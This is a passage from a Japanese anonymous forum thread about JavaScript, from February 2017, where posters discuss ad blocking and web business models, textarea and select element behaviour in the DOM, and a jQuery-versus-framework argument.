所で最近YouTubeの動画冒頭の広告見ないんだがなんでだろう?
意図的に消した記憶はないんだがuBlock originが対応してるのかな?
304 :
2017/02/23(木) 01:14:26.77 ID:???
モノは万が一広告費なんて概念が消失したら値段はむしろ下がる
それぐらい広告費というものは高い
ネットの諸サービス運営ですら無料無広告でやってるところは今でも意外とある

ただ絶対なくなりゃしないがな
305 :
2017/02/23(木) 01:20:34.06 ID:???
hostsでlocalhostに飛ばしてるとかじゃねーの
広告代理店を騙すという意味では受信だけして非表示もありだがトラッキングのことを考えると推奨できたもんではない
仕事のときと個人の立場での主張は別
306 :
2017/02/23(木) 01:24:54.45 ID:???
広告見たところでその商品買うことなんてないからな。
それなら見ないほうがよくね?
広告表示するだけでも広告主は金払ってるだろうし
307 :
2017/02/23(木) 06:26:49.39 ID:???
テキストエリアから入力データを取得するときvalueとhtmlどちらでもできるけど何か違いありますか?
308 :
2017/02/23(木) 06:41:45.23 ID:???
>>307
中身書き換えた後とか、取れる値が変わる
でIEは変わったり変わらなかったりしたはず
とりあえずvalueで(jQueryならval()で)アクセスすりゃ大丈夫
309 :
2017/02/23(木) 08:20:26.54 ID:???
>>303
おっしゃるとおり。価値のある物に相応の値段を払うのは必要。
放送では出来なかったから、CMなんて形が一般化したんだよな。
ただ、価値のある新しい物を、どう新しい価値があります!とドカッと広げたいってニーズもあるので、宣伝ってのをどうするかはまた1つ違う軸で話さなきゃならん。
そう言う意味でアマゾンのダッシュボタンは凄い。
広告同士の検討自体をさせない、という恐ろしい物の売り方。

YouTubeの広告飛ばすんだ。意外。

>>304
それは、無料でやってる部分と課金が必要な部分を、広告部分と広告でない部分、と分けてるだけで、無料分≒広告でしかないよ。
ちと前に流行ったフリーミアムモデルって奴かと。
自社内で完結するからあんまり表に出ないだけで。
310 :
2017/02/23(木) 09:43:25.51 ID:???
このスレのテンプレにすら非フリーミアム運営URLがあるというのに
311 :
2017/02/23(木) 13:21:53.47 ID:???
ビジネスモデルが確立されなければボランティアでもない限り非広告サイトは難しいだろうね
非広告サイトが好ましいことに反論する人はいないだろうけど、営利企業なら利益をあげなければならないからね
312 :
2017/02/23(木) 13:58:16.24 ID:???
非広告サイトにして使い方を書籍で販売、というのが最近の流れでもある
313 :
2017/02/23(木) 15:11:21.76 ID:???
>>311
そもそも一律に広告見せて一律の金取るというのが非効率なんだよ
有料会員だけ広告なしというのも2分化しただけだから然程でもない
それよりも価値を認めてくれた分、金を払ってくれる分貰うと言うのが良い
例えば個人ならAmazonのほしいものリスト晒したり、ギフト券受け付けるようにしたりな
314 :
2017/02/23(木) 15:39:08.77 ID:???
>>313
それはユーザが嬉しいだけでは
効率だけ考えたら一律のほうがw
315 :
2017/02/23(木) 15:40:45.21 ID:???
>>313
今は形を変えてツイートとかいいねになってるんじゃないか?
1円でも10円でも投げ銭システムあればいいけど、入金とかサイトへの設置とかめんどくさいんだよな
316 :
2017/02/23(木) 15:41:17.48 ID:???
というかそれこそクリックして広告踏んでやれよ
317 :
2017/02/23(木) 15:45:39.45 ID:???
そもそも買う側が値段決めるなんて
今の御時世ではリスキーすぎて中々できんだろうなあ
金持ってないキッズたちは1円も払わんだろうし

もしそれがうまくいく優しい世界なら
ウィキペディアは何度も何度も何度も何度も寄付のお願い出さずに済んでるはず
318 :
2017/02/23(木) 16:11:06.19 ID:???
他ならぬWikipedia 寄付のお願い_(ウィキペディア) より

>2014年6月の決算で、ウィキメディア財団の純資産は7700万ドルを超えている[10]。
>そのため、寄付のお願いはウィキペディアの危機を過剰に煽っているのでないかともいわれてきた[9][10]。
>ウィキメディアのソフト開発者であるオリ・リヴネは>財団のメーリングリストに
>「僕が(もちろん限られたものではあるけれど)理解している範囲では、
>いまの我々の財政状態と、お願いにあるような切迫感や懸念は釣り合っていない」と投稿したことがある[15]。
>莫大な寄付金の使途については、「ゴールデン・チェア」とも揶揄された
>職員一人あたり3200ドルに及ぶ家具の購入費が槍玉にあがったこともある[15]。

あんだけ多くのサーバを持ちよくわからん支出状況でも寄付によってこんだけ支えられている

javascriptスレでも良く出てくるMDNは主にGoogleからの収入と寄付によって運営してるのかね
319 :
2017/02/23(木) 17:09:44.57 ID:???
Mozillaの収入の97%は
Firefoxの検索窓のデフォルトをgoogleにしてあげるフィーだと聞いた
320 :
2017/02/23(木) 19:04:11.71 ID:???
JavaScript側でセレクトボックスのある項目をtrueにした場合、それまで選択されていた項目の
selectedは自動的にfalseになりますか?それともtrueが複数存在する形になりますか?
multiple要素は入れていません
現在選択されている項目のselectedをfalseにするコードも一緒に書く必要があるのか気になったのでよろしくお願いします
321 :
2017/02/23(木) 19:13:14.24 ID:???
非multipleなら自動的にselected=trueに変えたoption以外のoptionがfalseになって選択状態も外れる
322 :
2017/02/23(木) 19:32:08.11 ID:???
>>321
ありがとうございます
無駄なコードを記述するところでした
助かります
323 :
2017/02/23(木) 20:32:55.49 ID:???
質問とは関係ないけど、<option>に関して色々JS触ってたら、new Option()ってのがあることに気づいたわ。
new Imageもnew Audioもそうだけど、コンストラクタがある要素ってなんか特別だったりするのかな?
324 :
2017/02/24(金) 09:40:11.99 ID:???
多くが仕様上インターフェイスの写し身として存在するだけの意味のない堅物
325 :
2017/02/24(金) 18:27:37.90 ID:???
console.log(HTMLImageElement == Image); // false
console.log(HTMLImageElement.prototype == Image.prototype); // true in IE,Fx ; false in GC
これはやゔぁい
326 :
2017/02/24(金) 18:30:43.31 ID:???
>>325
問題があるようには見えないが
327 :
2017/02/24(金) 19:11:07.82 ID:???
同じく何が問題なのかわからん
328 :
2017/02/24(金) 20:04:59.74 ID:???
DOM仕様は一応はJSとは分離して作られてるから、
それをJSでどのように実装するかまで決められているわけではない。
Imageは仕様上コンストラクタなので.prototype下にそのようなプロパティを持っておくのは分かるが、
HTMLImageElementはインターフェイス代わりのJS流クラスもどきを仕方なく置いたもの。
でもこれをクラス流に継承してカスタム要素が出来るわけでもないので、そうする必然性はない。
むしろプロトタイプベース的にただのオブジェクトでインターフェイスを表現して簡素なチェーンで良かったと思う。
まあ何れにせよその2つの.prototypeが等しいべきかどうかなんて決めようが無いこと。
329 :
2017/02/24(金) 20:15:36.69 ID:???
実は「やゔぁい」と書きたかっただけで口実はなんでもよかったに一票
330 :
2017/02/25(土) 10:51:51.73 ID:???
ヵッオ やゔぁい
331 :
2017/02/25(土) 16:36:18.01 ID:???
DOM原理主義者vsJQ使い
332 :
2017/02/25(土) 16:37:36.64 ID:???
React派もいるんやで
333 :
2017/02/26(日) 05:33:58.18 ID:???
標準は使いにくいことが分かっているのでDOM原理主義者はいない
DOM.next+マイクロポリフィル派と、jQuery派と、大型フレームワーク派に別れる
334 :
2017/02/26(日) 08:05:58.55 ID:???
JQ使いは数行のスクリプトでもミニパッケージを読ませて無駄なウェイトを作り出す。
335 :
2017/02/26(日) 08:53:18.45 ID:???
申し訳ないがライブラリ論争はNG
336 :
2017/02/26(日) 11:35:15.56 ID:???
>>334
CDNとかキャッシュって知ってる?
毎回jQueryのファイルをダウンロードしてるわけじゃないんだよ
337 :
2017/02/26(日) 12:17:15.17 ID:???
ライブラリの話題はスレ違いなので>>2
338 :
2017/02/26(日) 13:04:32.56 ID:???
無駄なウェイトってどうせ1ミリ秒もないだろうし、
開発時間の無駄なウェイトのほうが重要
339 :
2017/02/26(日) 14:27:44.51 ID:???
そうかね?
最近Googleが出してたと思うけど、
JSの実行時間と同じくらい、ロードとパースに時間かかってるってデータがあったと思うけど。
スマートフォンではそれがまだまだ数百msとかかかる。
340 :
2017/02/26(日) 14:36:13.24 ID:???
jQueryで重いなら、それより数倍重いReactとかAngularとかモバイルでは使えないな
341 :
2017/02/26(日) 17:58:18.19 ID:???
>>2へどうぞ
342 :
2017/02/26(日) 19:59:34.58 ID:???
jquery ui以外でモードレスダイアログを作れるライブラリはありますか?
343 :
2017/02/26(日) 20:03:38.97 ID:???
DOM標準を使え。たしかwindow.showModalDialogとかあっただろ
344 :
2017/02/27(月) 14:57:28.69 ID:???
>>339
JQ使いは知らないんだろ
許してやれw
113KB

新着レスの表示

★スマホ版★■掲示板に戻る■全部前100次100最新50

名前:E-mail: